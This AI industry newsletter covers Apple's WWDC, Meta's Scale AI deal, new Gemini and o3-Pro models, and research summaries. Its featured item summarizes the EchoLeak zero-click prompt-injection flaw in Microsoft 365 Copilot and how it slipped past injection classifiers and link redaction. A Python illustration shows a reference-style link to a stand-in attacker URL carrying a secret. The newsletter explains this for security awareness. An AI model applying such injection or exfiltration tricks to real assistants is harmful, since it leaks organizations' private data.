Jun 20, 2025
Dear Readers,
Welcome to the 12th edition of Fine-Tuned by Genloop! This edition covers Apple's WWDC, where AI was notably not the highlight :), Meta's major push toward superintelligence through its investment in Scale AI, and new model releases from Google and OpenAI.
We also share our insights on one of Apple's research papers, "The Illusion of Thinking," which we will cover in more depth in our upcoming Research Jam.
So, let's dive in!
🌟 AI Industry Highlights
Apple's AI-Less WWDC 2025
Apple's WWDC 2025 focused primarily on the new Liquid Glass UI, with minimal AI-related announcements, even as other tech giants continue making major advances in artificial intelligence. Here are the AI features that were announced, though their release dates remain unspecified.
Key AI Highlights:
Live Translation: Real-time translation in Messages, FaceTime, and Phone calls running entirely on-device
Enhanced Visual Intelligence: Screen-aware AI can search and take action on anything displayed across iPhone apps
Workout Buddy on Apple Watch: AI-powered fitness coaching with personalized insights during workouts
Expanded Creative Tools: Updated Genmoji and Image Playground with ChatGPT integration for new styles
Intelligent Shortcuts: Direct integration with Apple Intelligence models for automated workflows
Developer Tools Enhancement: Apple integrates ChatGPT into Xcode 26 for intelligent coding and provides direct access to the on-device Foundation Models framework
Given Apple's vast resources, these updates fell short of expectations. With ongoing leadership changes, we hope next year's WWDC will help Apple regain its competitive edge in the AI race.

Meta Invests $14.3 Billion in Scale AI, Hires Its CEO to Lead Superintelligence Efforts
Meta has confirmed a "significant" investment in data-labeling company Scale AI, reportedly $14.3 billion for a 49% stake, while hiring Scale AI CEO Alexandr Wang to lead Meta's superintelligence efforts.
Key highlights:
Strategic Partnership: Meta's investment values Scale AI at $29 billion, with Wang joining Meta to lead its AI model development while remaining a board director at Scale AI
Open Weight Boost: The move could significantly strengthen Meta's Llama series and open-weight model capabilities, as Scale AI specializes in producing high-quality training data for leading AI labs (OpenAI is cutting ties with Scale AI following this deal)
The investment aims to address Meta's talent retention challenges and strengthen its competitive positioning against Google, OpenAI, and Anthropic. We hope this accelerates open-source AI development through improved Llama models.
Google Expands Gemini 2.5 Family with General Availability and New Flash-Lite Model
Google has released stable versions of Gemini 2.5 Flash and Pro for production use, while introducing Gemini 2.5 Flash-Lite as their fastest and most cost-efficient model in the 2.5 series.
Key highlights:
Production Ready: Gemini 2.5 Flash and Pro are now generally available with stable versions for enterprise deployment.
Flash-Lite Preview: The new Flash-Lite model offers higher quality than 2.0 Flash-Lite across coding, math, science, and reasoning benchmarks while delivering lower latency for high-volume tasks
The models are accessible through Google AI Studio, Vertex AI, and the Gemini app, with custom versions integrated into Google Search.
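For developers, here is a minimal sketch of what a Gemini 2.5 call looks like with the google-genai Python SDK; SDK details and model names are our assumptions and may differ slightly, especially for the preview Flash-Lite:

```python
# Minimal sketch: calling Gemini 2.5 via the google-genai Python SDK.
# Assumes `pip install google-genai` and a GEMINI_API_KEY environment variable.
from google import genai

client = genai.Client()  # picks up GEMINI_API_KEY from the environment

response = client.models.generate_content(
    model="gemini-2.5-flash",  # or "gemini-2.5-pro"; the Flash-Lite preview id may differ
    contents="Summarize the trade-off between latency and reasoning depth in two sentences.",
)
print(response.text)
```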
OpenAI Launches o3-Pro
OpenAI released o3-Pro, a version of its o3 reasoning model designed to think longer and provide its most reliable responses.
Key highlights:
Enhanced Reliability: Evaluated on "4/4 reliability," where the model must answer correctly in all four attempts; recommended for challenging questions where reliability matters more than speed
Full Tool Access: Includes web search, file analysis, visual reasoning, Python execution, and memory capabilities, though responses take significantly longer than previous models
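As a rough illustration, here is a minimal sketch of querying o3-Pro with the OpenAI Python SDK, assuming it is exposed through the Responses API; expect much higher latency than with non-reasoning models:

```python
# Minimal sketch: calling o3-pro via the OpenAI Python SDK's Responses API.
# Assumes `pip install openai` and an OPENAI_API_KEY environment variable.
from openai import OpenAI

client = OpenAI()

# o3-pro thinks longer before answering, so responses can take minutes.
response = client.responses.create(
    model="o3-pro",
    input="A bat and a ball cost $1.10 total; the bat costs $1.00 more than the ball. What does the ball cost?",
)
print(response.output_text)
```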
✨ Genloop Updates
Genloop Joins Meta's First Llama Startup Program!
We are proud to announce that we are part of the first cohort of AI at Meta's Llama Startup Program! 🦙 x ♾️
We look forward to exploring innovative possibilities with the Llama team as we work to make GenAI more domain-intelligent and production-ready.

Research Jam #6: Qwen3 Technical Report
Last week, we held Research Jam #6 on the Qwen3 Technical Report, where we covered some fascinating ground, including Qwen3's dual thinking/non-thinking modes, strong benchmark performance across model sizes, and the advanced distillation pipeline for knowledge transfer.
The discussion on thinking budgets and reasoning capabilities was particularly insightful.
If you'd like to revisit our discussion or couldn't make it this time, check out the session recording here:
Join Research Jam #7: Deep dive into Apple’s paper - The Illusion of Thinking
Research Jam #7 is happening on June 26th, where we'll dive into Apple's The Illusion of Thinking - the top research paper on LLM Research Hub for the week of June 2nd, 2025.
Spots are limited, so register today to secure your place!

📚 Featured Blog Post
We've got a fascinating read on a critical security discovery that highlights emerging AI vulnerabilities:
Microsoft 365 Copilot Hit by "EchoLeak" Zero-Click AI Vulnerability
Security researchers at Aim Labs discovered "EchoLeak," a critical zero-click vulnerability in Microsoft 365 Copilot that allows attackers to automatically exfiltrate sensitive data without user interaction.
Key highlights:
Zero-Click Attack: Attackers only need to send an email to victims, exploiting "LLM Scope Violation" where untrusted inputs access privileged organizational data through the AI system
Multiple Bypass Techniques: The attack chain circumvents Microsoft's XPIA classifiers, link redaction, and Content Security Policy protections using reference-style markdown and SharePoint/Teams URLs
Broad Data Access: Can exfiltrate any information in Copilot's context including chat history, Microsoft Graph resources, and organizational data across email, OneDrive, and Teams
The vulnerability exploits fundamental design flaws in RAG-based AI systems and represents the first zero-click exploit found in a major AI application, requiring no specific user behavior.
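To make the link-redaction bypass concrete, here is a hypothetical Python illustration (our sketch, not the actual exploit): a naive filter that strips inline markdown links never sees the URL in a reference-style link, because the URL lives on a separate definition line:

```python
# Hypothetical illustration of the bypass idea (not the EchoLeak payload):
# a redactor that only matches inline [text](url) links misses
# reference-style [text][ref] links, whose URL sits on its own line.
import re

INLINE_LINK = re.compile(r"\[([^\]]+)\]\(([^)]+)\)")  # matches [text](url) only

def naive_redact(markdown: str) -> str:
    """Strip inline links, keeping only the link text."""
    return INLINE_LINK.sub(r"\1", markdown)

inline = "See [report](https://attacker.example/leak?d=SECRET)"
reference = "See [report][1]\n\n[1]: https://attacker.example/leak?d=SECRET"

print(naive_redact(inline))     # -> "See report" (URL removed)
print(naive_redact(reference))  # reference-style URL survives untouched
```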

🔬 Research Corner
Check out our latest Top 3 Papers of the Week [June 9 - June 13, 2025]. Each week, our AI agents scour the internet for the best research papers, evaluate their relevance, and our experts carefully curate the top selections. Don't forget to follow us to stay up to date with our weekly research curation!

Now, let's deep dive into the top research from the last two weeks:
Scaling Test-Time Interaction for Agents: Thinking vs. Doing
Carnegie Mellon University, University of Illinois, University of Toronto, UC Berkeley, and NYU present research exploring a new dimension of test-time scaling for interactive agents by prioritizing interaction steps over reasoning tokens.
Key findings:
Interaction Over Reasoning: Scaling interaction steps outperforms scaling per-step reasoning under fixed compute budgets, achieving higher task success rates than existing methods
Curriculum-Based Training: TTI uses curriculum learning to gradually increase interaction horizons, preventing overfitting while avoiding training instability
Strong Web Performance: Gemma 3 12B with TTI achieves 64.8% on WebVoyager and 26.1% on WebArena, the highest among open-source agents trained on synthetic data
The research demonstrates that interaction scaling provides a complementary dimension to existing test-time compute methods, enabling adaptive exploration and backtracking during task execution.
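As a conceptual sketch (hypothetical parameters and names, not the paper's code), the curriculum idea boils down to a schedule that raises the agent's interaction-step budget as training progresses:

```python
# Conceptual sketch of curriculum-based interaction scaling (hypothetical
# parameters, not the paper's code): the agent's environment-step budget
# grows across training stages, shifting compute from longer per-step
# "thinking" toward more "doing" (exploration and backtracking).

def interaction_budget(stage: int, start: int = 4, step: int = 4, cap: int = 32) -> int:
    """Maximum environment interactions allowed at a given curriculum stage."""
    return min(start + stage * step, cap)

# Early stages keep horizons short for training stability; later stages
# permit longer rollouts.
for stage in range(8):
    print(f"stage {stage}: up to {interaction_budget(stage)} interaction steps")
```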
Read Our TuesdayPaperThoughts analysis

The Illusion of Thinking: Examining Large Reasoning Model Limits
Apple Research investigates the thinking capabilities of Large Reasoning Models using controllable puzzle environments to systematically analyze reasoning traces and performance patterns across complexity levels.
Key findings:
Three Performance Regimes: Standard LLMs outperform LRMs at low complexity; LRMs show advantages at medium complexity; both collapse at high complexity with zero accuracy
Overthinking Phenomenon: LRMs often identify correct solutions early but continue reasoning and choose incorrect alternatives, with counterintuitive reduction in reasoning tokens near critical thresholds
Execution Limitations: Even with explicit step-by-step algorithms, LRMs show no improvement and fail at similar complexity points, revealing fundamental logical execution constraints
The research demonstrates that analyzing reasoning traces beyond answer-only benchmarks reveals architectural limitations that sophisticated self-reflection mechanisms cannot overcome.
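To see why puzzles make complexity controllable, consider Tower of Hanoi, one of the environments the paper uses: n disks require exactly 2^n - 1 moves, so difficulty can be dialed up precisely while the ground-truth solution stays programmatically checkable. A small sketch (ours, not Apple's evaluation code):

```python
# Illustrative sketch (ours, not Apple's evaluation code): Tower of Hanoi
# gives a precise complexity dial, since n disks need exactly 2**n - 1 moves
# and the optimal solution is easy to verify.

def hanoi(n: int, src: str = "A", aux: str = "B", dst: str = "C") -> list[tuple[str, str]]:
    """Ground-truth optimal move sequence for n disks."""
    if n == 0:
        return []
    return hanoi(n - 1, src, dst, aux) + [(src, dst)] + hanoi(n - 1, aux, src, dst)

for n in range(1, 11):
    moves = hanoi(n)
    assert len(moves) == 2**n - 1  # solution length doubles with each disk
    print(f"{n} disks -> {len(moves)} moves")
```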
Read Our TuesdayPaperThoughts analysis

Looking Forward
As we witness significant efforts by tech giants like Meta to acquire top AI talent and compete aggressively, we also see companies like Apple perhaps taking a more measured approach. With this rapid pace of development, discovering new vulnerabilities like "EchoLeak" becomes crucial for ensuring the security of organizational data in AI systems.
Looking ahead, fascinating research is giving us deeper insight into how these LLMs actually "think," and we're excited about the future we're heading towards.
If you're exploring how to leverage these advances for your specific use case, we'd love to hear from you.
About Genloop
Genloop empowers enterprises to deploy GenAI in production with agents that understand business know-how and processes. We help companies build personalized LLMs that deliver superior performance, control, and simplicity—ideal for use cases like chatting with enterprise databases and transforming click-based workflows into conversational interfaces. Visit genloop.ai, follow us on LinkedIn, or reach out at founder@genloop.ai to learn more.